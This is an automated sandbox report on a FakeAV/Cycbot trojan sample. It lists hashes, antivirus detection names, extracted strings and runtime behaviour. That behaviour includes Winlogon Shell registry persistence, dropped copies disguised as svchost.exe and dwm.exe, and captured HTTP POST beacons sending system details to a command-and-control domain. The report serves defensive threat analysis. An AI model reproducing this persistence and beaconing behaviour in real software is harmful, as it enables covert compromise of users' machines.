Analysis Date2014-06-15 06:53:24
MD5dead140fa566f3919e4fa4700ed4ab3d
SHA19b24db367e076c9e3b7e8d47931061d28265fbcb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e57d2abc15743b6812b11c8ac46f8dbe sha1: 42b1aa3a591c7abdb52ccc729b4cf85cdc112519 size: 69120
Section.rdata md5: 0c15be8620c262cec62fba329eb44b24 sha1: a983d3deab0a67254b02a2a26614fd60f3bd58aa size: 4096
Section.data md5: bf323e9fdffa88927fa867cfb0d4adaf sha1: 08d0735d07100ff9620f3b6b63d1a283cb96d813 size: 45056
Section.rsrc md5: 9e9f8fc798ebc40571cc054577fd4d9d sha1: 8cbeb2ee2a2ee84fd8e5f08e2040ed8ef2d06a5c size: 1024
Timestamp2005-09-23 17:25:27
VersionPrivateBuild: 1091
FileDescription: MS Shell
PEhash33e5c82d004221545e7cc94302c656f6eca5783f
IMPhash15148e429baf6edf934b7822e8cfaf4d
AV360 SafeGen:Variant.Kazy.2365
AV360 SafeGen:Variant.Kazy.2365
AVAd-AwareGen:Variant.Kazy.2365
AVAd-AwareGen:Variant.Kazy.2365
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Downloader.Fraudload.Hdx
AVArcabit (arcavir)Downloader.Fraudload.Hdx
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Fakeav-53415
AVClamAVWin.Trojan.Fakeav-53415
AVDr. WebTrojan.Siggen2.7668
AVDr. WebTrojan.Siggen2.7668
AVEmsisoftGen:Variant.Kazy.2365
AVEmsisoftGen:Variant.Kazy.2365
AVEset (nod32)Win32/Kryptik.IAV
AVEset (nod32)Win32/Kryptik.IAV
AVFortinetW32/FakeAV.BZD!tr
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Variant.Kazy.2365
AVF-SecureGen:Variant.Kazy.2365
AVGrisoft (avg)Cryptic.BFI
AVGrisoft (avg)Cryptic.BFI
AVIkarusTrojan.Win32.FakeAV
AVIkarusTrojan.Win32.FakeAV
AVKasperskyTrojan-Downloader.Win32.FraudLoad.hdx
AVKasperskyTrojan-Downloader.Win32.FraudLoad.hdx
AVMalwareBytesBackdoor.Gbot
AVMalwareBytesBackdoor.Gbot
AVMcafeeBackDoor-EXI
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.2365
AVMicroWorld (escan)Gen:Variant.Kazy.2365
AVNormanswizzor/Heur.I
AVNormanswizzor/Heur.I
AVRisingTrojan.Win32.Generic.12575EC8
AVRisingTrojan.Win32.Generic.12575EC8
AVSophosTroj/FakeAv-BWP
AVSophosTroj/FakeAv-BWP
AVSymantecTrojan.FakeAV!gen39
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)TrojanDownloader.FraudLoad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSwww.google.com
Winsock DNS127.0.0.1
Winsock DNScheckserverstatux.com
Winsock DNSwhysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNSwww.google.com
Type: A
64.233.171.99
DNSwww.google.com
Type: A
64.233.171.147
DNSwww.google.com
Type: A
64.233.171.106
DNSwww.google.com
Type: A
64.233.171.105
DNSwww.google.com
Type: A
64.233.171.104
DNSwww.google.com
Type: A
64.233.171.103
DNSprotectyourpc-11.com
Type: A
69.43.161.170
DNScheckserverstatux.com
Type: A
DNSwhysohardx.com
Type: A
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_4&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 64.233.171.99:80
Flows TCP192.168.1.1:1032 ➝ 64.233.171.99:80
Flows TCP192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1035 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   34266e3d 30266578 7472613d 30204854   4&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
-
.p.v
.
.{
.
S

040904b0
1091
FileDescription
&Main
MS Sans Serif
MS Shell
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0&"-/,T
/\1od'v
??2@YAPAXI@Z
??3@YAXPAX@Z
-4ar`A
5mhkx@
6IyP;w&
_6	nY0V
$6\u-E\
72Nf!^
9?&8$A
9ZI8pU
ADVAPI32.dll
ADyGQD
<ah7P@
_amsg_exit
AODshw
)BTN'vG
,bw>fHe[
bx8_>z
CallNtPowerInformation
CertEnumSystemStoreLocation
_cexit
cFPUx[
CheckDlgButton
c"INNA
CloseHandle
CloseThemeData
CoCreateInstance
CoInitializeEx
CommandLineToArgvW
_controlfp
CoTaskMemFree
#C%r0+
CreateFontIndirectW
CreateSolidBrush
CreateThread
CreateWindowExW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
CVr#=43
c"ZCv1g%
@.data
DefWindowProcW
DeleteCriticalSection
DeleteObject
DestroyWindow
DialogBoxParamW
DispatchMessageW
)=Dp("
dwbCEw
e-06">u
e2N[t\
EnableWindow
EndDialog
EnterCriticalSection
ExitProcess
]"f7q:|,
.F7?)^!Q
Fg9gl9b
FindResourceW
FindWindowExW
FindWindowW
FreeResource
g+=!@#
GDI32.dll
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDlgCtrlID
GetDlgItem
GetLastError
GetMessageW
GetModuleHandleA
GetParent
GetProcessVersion
GetStartupInfoW
GetSysColor
GetSysColorBrush
GetSystemTimeAsFileTime
GetThemeColor
GetThemeFont
GetTickCount
GetTraceEnableFlags
GetTraceEnableLevel
GetTraceLoggerHandle
GetWindowLongW
GetWindowTextLengthW
GetWindowTextW
GlobalAlloc
hlFreh
hLocah
hroteh
hSleeh
hualPh
h]wbn'
[<h:z@
:iFhBd
InitializeCriticalSection
_initterm
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
`\io}F
Irw!8y
IsDlgButtonChecked
IUd==(YV
iv'& #O
IWL5r}
jDyVQ5h
jF8Y:~
j@hmw@
;..JJh_
#jKL-E
J\O"J)Gf
)k|ac7
KERNEL32.dll
KillTimer
?=KM!<
kmo5lVW
kTy*@6l`V
l:{@{@
LeaveCriticalSection
>L~<Hl
LoadIconW
LoadResource
LoadStringW
LocalAlloc
LocalFree
LockResource
lPRWPW
memset
M(hqX@
mLTPi	
msvcrt.dll
MwwD6wY
mYMEn,
;N2yM:#
N}3X56i
N8b6\A
N#CO8%
NcV($Y
NNmpd;]#E
nSO68vWe
ole32.dll
OpenThemeData
P3W/PP
p.)\AG2
__p__commode
__p__fmode
P-n_mSR
PostMessageW
PostQuitMessage
\PO~W%
POWRPROF.dll
PPPPJP: 
;PPUPP
|pSC =oS
Pt8mQ[
pt*qi^
PWRP$)
]PxJPu4.
Qp?<1M%#
QueryPerformanceCounter
]"/[r9~
`.rdata
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassExW
RegisterDeviceNotificationW
RegisterTraceGuidsW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
rUh+E$
rV1>Kd
~r[V?S
rxm<6w8
S2K;t`
sB*-A-
SendDlgItemMessageW
SendMessageW
SetActiveWindow
__set_app_type
SetBkColor
SetDlgItemTextW
SetFocus
SetForegroundWindow
SetTextColor
SetTimer
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiDestroyDeviceInfoList
SetupDiEnumDeviceInterfaces
SetupDiGetClassDevsExW
__setusermatherr
SetWindowLongW
SetWindowTextW
s<h7y@
SHELL32.dll
ShellExecuteExW
ShowWindow
S n7{V
TerminateProcess
?terminate@@YAXXZ
!This program cannot be run in DOS mode.
t,nVT1^
TraceMessage
TranslateMessage
Ty|[km
uhhLibr
u$h-r@
UnhandledExceptionFilter
UnregisterClassW
UnregisterDeviceNotification
UnregisterTraceGuids
USER32.dll
us$	*G
uu&{Ub
UxTheme.dll
^V6x|:
_vsnwprintf
|VWe%`)jE
w.61w,
WaitForSingleObject
_wcmdln
_wcsicmp
wcstoul
wCX5wj
__wgetmainargs
WideCharToMultiByte
W?qx3%^
wre 	y
WTSAPI32.dll
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
WVbJ&<
X4PlV:
xC6;260}
xc`}gw
_XcptFilter
\`Xdor
xdS#g2
XIeg1n
\x>{QZ
Xv3t#6
y4pd=:h
^Yck[3
:ytitX;D
ZgCsYV
Z>J|KB
zQyNl"
ZThLoca